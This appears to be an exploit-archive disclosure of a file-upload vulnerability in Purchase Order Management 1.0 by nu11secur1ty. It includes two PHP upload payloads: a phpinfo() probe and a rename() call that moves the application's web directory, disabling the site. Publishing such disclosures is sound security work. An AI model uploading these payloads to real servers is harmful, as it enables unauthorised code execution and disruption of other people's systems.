Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Purchase Order Management 1.0 Shell Upload[6]
- Authored by nu11secur1ty[7]
-
Purchase Order Management version 1.0 suffers a remote shell upload vulnerability. Flow details to achieve this are shown in the video link provided.
- SHA-256 |
ebd87a2284147cd2df2e918dac7d56fd2fe8ef6e6817d1b763329b3720bb9d2a
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
## Title: Purchase Order Management-1.0 - File Inclusion Vulnerabilities - Unprivileged user interaction - file upload in the server
## Author: nu11secur1ty
## Date: 03.06.2023
## Vendor: https://www.sourcecodester.com/user/257130/activity
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/
## Description:
The Purchase Order Management-1.0 suffer from File Inclusion Vulnerabilities.
The users of this system are allowed to submit input into files or
upload files to the server.
The malicious attacker can get absolute control of this system!
STATUS: CRITICAL Vulnerability
[+]Get Info:
```PHP
<?php
// by nu11secur1ty - 2023
phpinfo();
?>
```
[+]Exploit:
```PHP
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/purchase_order/" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/purchase_order_stupid/" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;
?>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0)
## Proof and Exploit:
[href](https://streamable.com/vkq31h)
## Time spend:
00:35:00
File Tags
- ActiveX[17] (932)
- Advisory[18] (80,443)
- Arbitrary[19] (15,880)
- BBS[20] (2,859)
- Bypass[21] (1,647)
- CGI[22] (1,020)
- Code Execution[23] (7,019)
- Conference[24] (675)
- Cracker[25] (840)
- CSRF[26] (3,304)
- DoS[27] (22,875)
- Encryption[28] (2,357)
- Exploit[29] (50,614)
- File Inclusion[30] (4,177)
- File Upload[31] (950)
- Firewall[32] (821)
- Info Disclosure[33] (2,681)
- Intrusion Detection[34] (876)
- Java[35] (2,954)
- JavaScript[36] (829)
- Kernel[37] (6,423)
- Local[38] (14,278)
- Magazine[39] (586)
- Overflow[40] (12,520)
- Perl[41] (1,419)
- PHP[42] (5,108)
- Proof of Concept[43] (2,295)
- Protocol[44] (3,477)
- Python[45] (1,484)
- Remote[46] (30,234)
- Root[47] (3,528)
- Rootkit[48] (502)
- Ruby[49] (600)
- Scanner[50] (1,633)
- Security Tool[51] (7,818)
- Shell[52] (3,125)
- Shellcode[53] (1,206)
- Sniffer[54] (890)
- Spoof[55] (2,179)
- SQL Injection[56] (16,157)
- TCP[57] (2,383)
- Trojan[58] (687)
- UDP[59] (880)
- Virus[60] (663)
- Vulnerability[61] (31,338)
- Web[62] (9,446)
- Whitepaper[63] (3,738)
- x86[64] (946)
- XSS[65] (17,556)
- Other[66]
File Archives
- March 2023[67]
- February 2023[68]
- January 2023[69]
- December 2022[70]
- November 2022[71]
- October 2022[72]
- September 2022[73]
- August 2022[74]
- July 2022[75]
- June 2022[76]
- May 2022[77]
- April 2022[78]
- Older[79]
Systems
- AIX[80] (426)
- Apple[81] (1,950)
- BSD[82] (370)
- CentOS[83] (55)
- Cisco[84] (1,918)
- Debian[85] (6,704)
- Fedora[86] (1,690)
- FreeBSD[87] (1,242)
- Gentoo[88] (4,288)
- HPUX[89] (878)
- iOS[90] (338)
- iPhone[91] (108)
- IRIX[92] (220)
- Juniper[93] (67)
- Linux[94] (44,982)
- Mac OS X[95] (684)
- Mandriva[96] (3,105)
- NetBSD[97] (256)
- OpenBSD[98] (481)
- RedHat[99] (12,837)
- Slackware[100] (941)
- Solaris[101] (1,609)
- SUSE[102] (1,444)
- Ubuntu[103] (8,399)
- UNIX[104] (9,202)
- UnixWare[105] (185)
- Windows[106] (6,529)
- Other[107]
